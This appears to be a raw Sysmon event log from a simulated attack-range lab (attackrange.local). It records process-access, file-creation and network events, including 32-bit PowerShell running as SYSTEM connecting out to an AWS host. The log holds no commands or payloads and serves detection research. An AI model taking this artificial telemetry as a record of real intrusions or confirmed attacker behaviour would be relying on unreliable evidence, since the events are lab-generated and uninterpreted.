21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150420Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150419Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150418Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150417Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150416Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150415Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150414Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150413Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150412Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150411Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150410Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150409Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150408Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150407Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150406Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150405Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150404Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150403Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:20.036{39BD8DE3-0F64-60CA-0D00-00000000D101}788808C:\Windows\system32\svchost.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000104788Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:19.833{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55405-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104787Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:21.218{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=377701B1F0A55A40A9892E40AC37CC1C,SHA256=83B747ED342004A4B5F1C7A0BDFDE1F16E0D15E058817F78C15EC08193EDB5AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150427Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:21.801{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71A6A755A45CBF255F371287F89153A1,SHA256=C9A803B8604FDD34B0756E3026ADC461A2488B99E139DAEFAD8D8B5475EEC51F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104789Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:22.581{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F596195464DD10E8A9F8C2C5FBBA0BE7,SHA256=19EB1F6954528648511E91EB35CA95CE6DA14DC39A4F09BF1075B4E2DE547872,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150429Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:22.804{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E8C333E62BE70E211CB20888DC18245,SHA256=A4DEFEEFAB8D6F9BC81E31E4E8C7F8B8D18E97BF188C01FACD5958FBA8EB6089,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150428Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:22.420{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FDD66532DBE489E25CE984024A58E240,SHA256=D2E2055B2DCCD467F14783DD099CD9905090E2A5E0F95776EA2264BF0D80F914,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104791Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:23.943{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F94D459C8C469EEDF694BF0FF83712A1,SHA256=FCF5EAAF5A69ACCFCCF0A872B276CC4528A9C8EB48C095D497768C996E0F057C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104790Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:23.265{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F52D64E95777F41D610B72B1A60030BA,SHA256=A066E446736EBD3A2A94A3B93BAC46714326DDB5132CC52AD63B4893E827A395,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150434Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:23.819{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=451F2AC1BF1DC60CDD67BAE6DF674CF3,SHA256=83E2AEB3DFA186CB7ACA74F72B59D3B13D1D341D7923F371BF7D109719C1A89F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150433Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:21.240{39BD8DE3-26DA-60CA-F703-00000000D101}5228C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58385-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x8000000000000000150432Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:23.382{39BD8DE3-0FD9-60CA-8B00-00000000D101}19882956C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55af0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF801C50EF8C8)|UNKNOWN(FFFF9B90A66B4A68)|UNKNOWN(FFFF9B90A66B4BE7)|UNKNOWN(FFFF9B90A66AF271)|UNKNOWN(FFFF9B90A66B0C3A)|UNKNOWN(FFFF9B90A66AEEF6)|UNKNOWN(FFFFF801C4E06E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000150431Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:23.382{39BD8DE3-0FD9-60CA-8B00-00000000D101}19882956C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+555d1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF801C50EF8C8)|UNKNOWN(FFFF9B90A66B4A68)|UNKNOWN(FFFF9B90A66B4BE7)|UNKNOWN(FFFF9B90A66AF271)|UNKNOWN(FFFF9B90A66B0C3A)|UNKNOWN(FFFF9B90A66AEEF6)|UNKNOWN(FFFFF801C4E06E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000150430Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:23.382{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF17dbe41.TMPMD5=2C01CABB664DCA78393A9C410B7040DB,SHA256=E2BCE1F5539DFFCCEDF4DA06C8D5B510DA58D14487D15A58F832D3B1C9C48C79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150437Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:24.819{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C35BA98A6D832BD6CD8B06A2A5571A7,SHA256=11DC42CD9C8A540CB466B2584E5D6189F407424D750DCBE08E3F918BBC928982,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150436Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:22.921{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58386-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150435Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:24.120{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2861862351C94EF4984D7E3CEBC9DAE,SHA256=273E773103D885F980EC84040FAE7D7CBD2F185BEC9DA22ADD2F9868F91EEC8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104792Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:25.308{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D5AFEAA51BB87BC316A8B0D8BB7AAE5,SHA256=F9F3AF4931549F5176A7684D3C3BBBC1A9A8E5A347F3D984F1B322AA62FCA5A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150438Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:25.834{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA23D02C1327069D14E080A5EF610D1E,SHA256=E3E13C0DC9B74C77B9D1FC917C820F31A4214B95DD8B620F70268DD920CF76BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104793Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:26.678{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C3510BB92ECA1BC4A854C573571DA9D,SHA256=7C9DC165E524ECD81BF2F4EE35A961AB76E3529CDD965FA563362F876EFD1287,IMPHASH=00000000000000000000000000000000falsetrue 